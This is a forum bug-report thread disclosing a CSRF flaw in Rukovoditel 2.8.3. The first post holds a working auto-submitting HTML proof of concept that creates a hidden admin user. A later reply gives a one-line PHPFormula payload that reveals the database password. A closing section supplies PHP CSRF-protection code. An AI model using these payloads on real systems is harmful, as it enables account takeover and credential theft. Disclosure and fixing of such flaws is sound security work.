CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

TuongNC
Posts: 12
Joined: 19 Dec 2020, 09:40
Name: Tuong Ngo Cat
Location: Ha Noi
Company Name: None

CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by TuongNC »

CSRF vulnerability on Rukovoditel 2.8.3

## Bug Description
Hi. I found a CSRF in the add-new-user module in Rukovoditel 2.8.3. A hacker can add a new user with admin privileges.

## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF POC using the following code.

```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cross Site Request Forgery</title>
</head>

<body onload="javascript:fireForms()">
<script type="text/javascript">
// Submit every form on the page in DOM order. The browser attaches the
// victim's Rukovoditel session cookie to each cross-site POST, so the
// requests are processed as if the logged-in admin had sent them.
function fireForms()
{
    var count = document.forms.length;
    var i = 0;

    for (i = 0; i < count; i++)
    {
        document.forms[i].submit();
    }
}
</script>

<H2>Cross Site Request Forgery</H2>

<!-- Request 1: the username/e-mail validation endpoint of the user form. -->
<form method="POST" name="form1" action="http://localhost//rukovoditel_2.8.3/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin1"/>
<input type="hidden" name="useremail" value="admin1@admin.com"/>
</form>

<!-- Request 2: the save action that creates the user record. The fields[N]
     names are the field IDs captured from the 2.8.3 "add user" form. -->
<form method="POST" name="form0" action="http://localhost//rukovoditel_2.8.3/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin1"/>
<input type="hidden" name="password" value="admin1pass"/>
<input type="hidden" name="fields[7]" value="admin1pass"/>
<input type="hidden" name="fields[8]" value="Name is Nothing"/>
<input type="hidden" name="fields[10]" value=""/>
<input type="hidden" name="fields[9]" value="admin1@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>

</body>
</html>
```

2. Replace the URI with the path to your Rukovoditel 2.8.3 folder and change the password field.
3. Send the link to the script to the victim (admin) and make them click it.
4. Log in with the new user.


## Server Information

Xampp on Windows 10

### PHP Operating System

Windows NT DESKTOP-BDPIT37 10.0 build 18363 (Windows 10) AMD64

### PHP Version

PHP Version 7.4.15
Last edited by TuongNC on 12 Mar 2021, 07:48, edited 1 time in total.
marajah
Posts: 13
Joined: 31 Aug 2020, 13:28
Name: Albro
Location: Italia
Company Name: Alacer Sas

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by marajah »

Hi, Tuong

It works, but in my case I had to put the PHP file with the malicious code on the same server. Also, it worked when the connection was on the same protocol (HTTPS).

This means that (in my case, with my server configuration and the SameSite property of my cookies set to true) it is harder to achieve, but not too much. It can be done by someone having write permission on a public folder, or by a user uploading a file with the PHP content included.
But in many other installations it could be a more serious problem, I guess; especially where guest users are allowed to register and upload files.
The only thing you have to do is to make someone with the permission to create users open the malicious page while logged in.
At the end you will have a new admin user, ready to be used to log in without anybody knowing it.

@support
I'm not skilled enough to figure out how to solve it, but maybe a token could help to protect the session (considering that it cannot be put in the malicious form)?
TuongNC
Posts: 12
Joined: 19 Dec 2020, 09:40
Name: Tuong Ngo Cat
Location: Ha Noi
Company Name: None

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by TuongNC »

marajah wrote: 11 Mar 2021, 04:03
> Hi, Tuong
>
> It works, but in my case I had to put the PHP file with the malicious code on the same server. Also, it worked when the connection was on the same protocol (HTTPS).
>
> This means that (in my case, with my server configuration and the SameSite property of my cookies set to true) it is harder to achieve, but not too much. It can be done by someone having write permission on a public folder, or by a user uploading a file with the PHP content included.
> But in many other installations it could be a more serious problem, I guess; especially where guest users are allowed to register and upload files.
> The only thing you have to do is to make someone with the permission to create users open the malicious page while logged in.
> At the end you will have a new admin user, ready to be used to log in without anybody knowing it.
>
> @support
> I'm not skilled enough to figure out how to solve it, but maybe a token could help to protect the session (considering that it cannot be put in the malicious form)?

Yes, in this case we need an admin who has a session cookie to click the link.
support
Site Admin
Posts: 6194
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by support »

Again you are testing with localhost and Xampp. By default sessions are the same for all localhost folders; that is why you can send a request from an HTML form if there is a logged-in user in http://localhost//rukovoditel_2.8.3/
But on a live server you can't do it.
TuongNC
Posts: 12
Joined: 19 Dec 2020, 09:40
Name: Tuong Ngo Cat
Location: Ha Noi
Company Name: None

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by TuongNC »

support wrote: 11 Mar 2021, 21:21
> Again you are testing with localhost and Xampp. By default sessions are the same for all localhost folders; that is why you can send a request from an HTML form if there is a logged-in user in http://localhost//rukovoditel_2.8.3/
> But on a live server you can't do it.

On a live server, I just need the ADMIN to click my link and go to my website; the POST method will be triggered.
support
Site Admin
Posts: 6194
Joined: 19 Oct 2014, 18:22
Name: Sergey Kharchishin
Location: Russia, Evpatoriya

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by support »

You can't do any action if you are not logged in. So any HTML files like this will redirect to login.
TuongNC
Posts: 12
Joined: 19 Dec 2020, 09:40
Name: Tuong Ngo Cat
Location: Ha Noi
Company Name: None

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by TuongNC »

Yes, and if the user has been logged in?
marajah
Posts: 13
Joined: 31 Aug 2020, 13:28
Name: Albro
Location: Italia
Company Name: Alacer Sas

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by marajah »

support wrote: 11 Mar 2021, 21:57
> You can't do any action if you are not logged in. So any HTML files like this will redirect to login.

It's not the attacker that needs to be logged in, but the victim. When the victim is logged in and clicks on the page, the actions will be done on behalf of the victim.
https://en.wikipedia.org/wiki/Cross-sit ... st_forgery
There are some public databases of exploits of this and other types that could be directed at Rukovoditel. Probably they are not crazily dangerous, but I'm not skilled enough to say.
https://packetstormsecurity.com/search/?q=rukovoditel
https://www.exploit-db.com/
https://www.cvedetails.com/product/5413 ... r_id=19833
TuongNC
Posts: 12
Joined: 19 Dec 2020, 09:40
Name: Tuong Ngo Cat
Location: Ha Noi
Company Name: None

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by TuongNC »

marajah wrote: 12 Mar 2021, 00:50
> support wrote: 11 Mar 2021, 21:57
> > You can't do any action if you are not logged in. So any HTML files like this will redirect to login.
>
> It's not the attacker that needs to be logged in, but the victim. When the victim is logged in and clicks on the page, the actions will be done on behalf of the victim.
> https://en.wikipedia.org/wiki/Cross-sit ... st_forgery
> There are some public databases of exploits of this and other types that could be directed at Rukovoditel. Probably they are not crazily dangerous, but I'm not skilled enough to say.
> https://packetstormsecurity.com/search/?q=rukovoditel
> https://www.exploit-db.com/
> https://www.cvedetails.com/product/5413 ... r_id=19833

Nice comment <3
swar
Posts: 60
Joined: 19 Dec 2020, 04:11
Name: A.R.
Location: Bratislava

Re: CSRF vulnerability on Rukovoditel 2.8.3 Hacker can add new user with admin privilege

Post by swar »

This looks like a critical security bug requiring an immediate patch. A typical basic CSRF vulnerability.

It does not matter that the attacker is not logged in; the problem is that the attacker can easily achieve that the script is activated by a logged-in user, e.g. by sending the admin a link to a malicious page by e-mail. If the admin clicks the link, the attacker has succeeded.

Even worse is that it seems to me (I have not tested it) that Rukovoditel is not protected against CSRF at all. If so, any available action could be activated by an attacker using this technique, everything you can imagine: adding new entries, adding new fields, deleting entities, changing the admin's e-mail and password ... countless options.

@TuongNC Did you have a chance to test other forms in the app?
@support Please fix this asap. Also, please confirm that there are measures against CSRF in Rukovoditel and there are no other forms with this vulnerability.

Edit: The vulnerability is real, I just successfully reproduced it. No need for the same domain; it works even if the code is somewhere else. A malicious script on localhost hacked my Rukovoditel 2.8.3 running on professional web hosting with SSL. With this, the attacker will gain access to the admin's account. Then he can simply create a field of type PHPFormula in any entity, input the code

```php
echo DB_SERVER_PASSWORD;
```

and then he also has your DB password. :(
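The fix marajah asked about and swar requested is the standard synchronizer-token pattern, combined with a SameSite session cookie and an Origin/Referer check as defence in depth. The PHP below is an added example written for this thread; it is not Rukovoditel's code, and the handler name `handle_save_user`, the field name `csrf_token` and the PHP >= 7.3 requirement (array form of `session_set_cookie_params`) are assumptions. The attacker's page cannot read the victim's token because of the same-origin policy, so a forged POST such as the one in the first post arrives without it and is rejected, regardless of whether the page is hosted on localhost or elsewhere.

```php
<?php
// Added example, not Rukovoditel's code: CSRF protection for a PHP form handler
// such as index.php?module=items/&action=save. Assumes PHP >= 7.3 and that login
// state lives in the PHP session, as in the forum thread.
declare(strict_types=1);

// 1. Harden the session cookie. SameSite=Lax makes the browser withhold the
//    cookie from cross-site POSTs; HttpOnly keeps it away from script.
function start_hardened_session(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off',
        'samesite' => 'Lax',
    ]);
    session_start();
}

// 2. One unguessable token per session, stored server side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden input to print inside every state-changing <form>.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// 3. Verify the submitted token against the session copy in constant time.
//    A missing token (the forged request in the first post) fails here.
function csrf_verify(array $post, string $session_token): bool
{
    $submitted = $post['csrf_token'] ?? '';
    if (!is_string($submitted) || $submitted === '' || $session_token === '') {
        return false;
    }
    return hash_equals($session_token, $submitted);
}

// 4. Defence in depth: the Origin (or Referer) host must be our own host.
//    $expected_host is $_SERVER['HTTP_HOST'], possibly with a port suffix.
function same_origin(array $server, string $expected_host): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($source === '') {
        return false; // neither header present: treat as cross-site
    }
    $host     = parse_url($source, PHP_URL_HOST);
    $expected = explode(':', $expected_host)[0]; // drop ":port"
    return is_string($host) && $expected !== '' && strcasecmp($host, $expected) === 0;
}

// Hypothetical handler showing where the checks go: before any write.
function handle_save_user(array $post, array $server): string
{
    start_hardened_session();
    if (!same_origin($server, $server['HTTP_HOST'] ?? '')) {
        http_response_code(403);
        return 'cross-site request rejected';
    }
    if (!csrf_verify($post, $_SESSION['csrf_token'] ?? '')) {
        http_response_code(403);
        return 'missing or invalid CSRF token';
    }
    // ... validate fields and create the user only after both checks pass ...
    return 'ok';
}
```

Two caveats worth keeping in mind from the thread. SameSite and the Origin check do nothing against marajah's variant where the malicious file is uploaded to the same server, because those requests are same-site; only the token stops that, and even the token fails if the uploaded file can run script on the same origin (at that point the bug is arbitrary file upload, not CSRF). And the token must be checked on every state-changing action, including `users/validate_form` and the items save action used in the proof of concept; protecting only the user form leaves the other actions swar lists exposed.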